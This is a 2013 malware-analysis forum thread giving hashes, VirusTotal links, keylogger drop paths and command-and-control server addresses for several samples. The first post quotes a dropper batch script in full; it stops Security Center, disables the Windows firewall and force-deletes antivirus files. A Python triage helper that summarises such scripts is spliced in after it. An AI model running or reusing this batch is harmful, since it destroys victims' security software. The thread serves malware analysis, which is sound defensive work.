A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #19470  by EP_X0FF
 Thu May 30, 2013 2:12 am
MMPC description http://www.microsoft.com/security/porta ... adabindi.G

SHA256: e2dee10881ceafddf3fc8fbe16c4fc1b14898c52e34b985cd7b0ef7b531e38df
SHA1: 5af0c48c88da182d337c60c0ba1f0dd067c93df6
MD5: 4f80ed5be19fdf11d1fb27240640ba40

https://www.virustotal.com/en/file/e2de ... 369879627/

script-kiddie trash

batch included
Code:
echo off
net stop “Security Center”
netsh firewall set opmode mode=disable
del E-*
del av*
del fire*
del anti*
del spy*
del bullguard
del PersFw
del KAV*
del UfseAgnt*
del Spy*
del ZONEALARM
del SAFE***
del OUTPOST*
del nv*
del nav*
del F-*
del cle*
del BLACKICE
del def*
del kav*
del avg*
del ash*
del aswupdsv
del ewid*
del guard*
del guar*
del gcasDt*
del msmp*
del mcafe*
del mghtml
del msiexec
del *safe*
del zap*
del zauinst
del upd*
del zlclien*
del minilog
del cc*
del norton*
del norton au*
del ccc*
del npfmn*
del loge*
del nisum*
del issvc
del tmp*
del tmn*
del pcc*
del cpd*
del pop*
del pav*
del padmin
del panda*
del avsch*
del sche*
del syman*
del *virus*
del realm*
del sweep*
del scan*
del ad-*
del safe*
del avas*
del norm*
del offg*
del /Q /F %ProgramFiles%\alwils~1\avast4\*.*
del /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\******
del /Q /F %ProgramFiles%\kasper~1\******
del /Q /F %ProgramFiles%\trojan~1\******
del /Q /F %ProgramFiles%\f-prot95\*.*
del /Q /F %ProgramFiles%\tbav\*.dat
del /Q /F %ProgramFiles%\avpersonal\*.*
del /Q /F %ProgramFiles%\Norton~1\*.*
del /Q /F %ProgramFiles%\Mcafee\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
del /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
del /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*
del /Q /F %ProgramFiles%\Norton~1\*.*
del /Q /F %ProgramFiles%\avgamsr\******
del /Q /F %ProgramFiles%\avgamsvr\******
del /Q /F %ProgramFiles%\avgemc\******
del /Q /F %ProgramFiles%\avgcc\******
del /Q /F %ProgramFiles%\avgupsvc\******
del /Q /F %ProgramFiles%\grisoft
del /Q /F %ProgramFiles%\nood32krn\******
del /Q /F %ProgramFiles%\nood32\******
del /Q /F %ProgramFiles%\nod32\******
del /Q /F %ProgramFiles%\nood32\******
del /Q /F %ProgramFiles%\kav\******
del /Q /F %ProgramFiles%\kavmm\******
del /Q /F %ProgramFiles%\kaspersky\*.*
del /Q /F %ProgramFiles%\ewidoctrl\******
del /Q /F %ProgramFiles%\guard\******
del /Q /F %ProgramFiles%\ewido\******
del /Q /F %ProgramFiles%\pavprsrv\******
del /Q /F %ProgramFiles%\pavprot\******
del /Q /F %ProgramFiles%\avengine\******
del /Q /F %ProgramFiles%\apvxdwin\******
del /Q /F %ProgramFiles%\avira\******
del /Q /F %ProgramFiles%\panda software
Attachments
pass: infected
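Added example (not code from this thread or the sample): a small Python triage helper that walks a dropper batch like the one posted above and summarises the defence-tampering actions it takes (service stops, firewall disable, file deletions) so an analyst can report them without running the script. SAMPLE_BATCH is a constructed excerpt shaped like the quoted batch; BatchTriage, triage_batch and findings are names chosen here.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input shaped like the dropper batch quoted above (not the full file).
SAMPLE_BATCH = r"""echo off
net stop "Security Center"
netsh firewall set opmode mode=disable
del av*
del norton au*
del /Q /F %ProgramFiles%\alwils~1\avast4\*.*
del /Q /F %ProgramFiles%\kaspersky\*.*
"""

@dataclass
class BatchTriage:
    stopped_services: list = field(default_factory=list)
    firewall_disabled: bool = False
    deletions: list = field(default_factory=list)  # one (targets, flags) tuple per del line

def triage_batch(text: str) -> BatchTriage:
    """Walk a batch file line by line and record the defence-tampering actions it takes."""
    result = BatchTriage()
    for raw in text.splitlines():
        tokens = raw.strip().split()
        if not tokens:
            continue
        cmd = tokens[0].lower().lstrip("@")
        if cmd in ("echo", "rem") or cmd.startswith("::"):
            continue  # output/comment lines carry no action
        if cmd == "net" and len(tokens) >= 3 and tokens[1].lower() == "stop":
            # service names with spaces arrive quoted; tolerate curly quotes from copy-paste
            result.stopped_services.append(" ".join(tokens[2:]).strip('"“”'))
        elif cmd == "netsh" and re.search(r"opmode\s+mode=disable", raw, re.I):
            result.firewall_disabled = True
        elif cmd in ("del", "erase"):
            flags = [t.upper() for t in tokens[1:] if t.startswith("/")]
            targets = [t for t in tokens[1:] if not t.startswith("/")]
            result.deletions.append((targets, flags))
    return result

def findings(t: BatchTriage) -> list:
    """Analyst-facing summary lines for a triage report."""
    out = [f"stops service: {s}" for s in t.stopped_services]
    if t.firewall_disabled:
        out.append("disables Windows Firewall (netsh firewall set opmode mode=disable)")
    if t.deletions:
        forced = sum(1 for _, flags in t.deletions if "/F" in flags)
        out.append(f"deletes {len(t.deletions)} path patterns ({forced} with /F force)")
    return out
```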
 #20440  by rough_spear
 Fri Aug 09, 2013 8:13 pm
Hi All,

This malware has an excellent capability of key logging. After execution it drops the file java.exe in %temp% and creates a java.exe.tmp file where it actually stores all the key strokes from the user.

MD5 - 30E363C63AB1BA3BA87AD281E31CA223

VT link - https://www.virustotal.com/en/file/ed87 ... /analysis/

Regards,

rough_spear. ;)
Attachments
password - infected.
 #21535  by patriq
 Mon Dec 02, 2013 8:49 pm
Xylitol wrote: https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.
[image]
That's pretty funny.

Fuck anti-VM, they just gonna start putting anti-"Xyl" detection soon. Lol. :D

Good stuff as usual man.


That java.exe sample was hosted at hxxp://silver13.net/
A few more samples from the same server, attached.
Low detection rates.. still some MSIL .NET crap
Code:
sub.exe
560FFF8CCFA8AE563F00483659659F78

dex.exe
C5A4103DF0A10F19916CCCBB0E989D14

doc.exe
3262D5E2855FEF2C9263A47DEE2AC3A5

(from VxVault)
I thought that dex.exe (C5A4103DF0A10F19916CCCBB0E989D14) would be a Dexter sample, since you caught him on a POS machine before.. but it looks like "SecureDll.dll" loading into IE address space.. I think it's just formgrabber/keylogger ability. Anyone confirm?

Probable spot where keystrokes are stored:
Code:
HKEY_CURRENT_USER\Software\HelperSolutions Software
"%System%\strokes.log"
Notes about the servers this "hacker" uses in this campaign:
Code:
silver13.net.           158.58.173.181 - RIPE-ERX NL
silver13.no-ip.biz.     197.15.207.77  - Agence Tunisienne Internet
Attachments
infected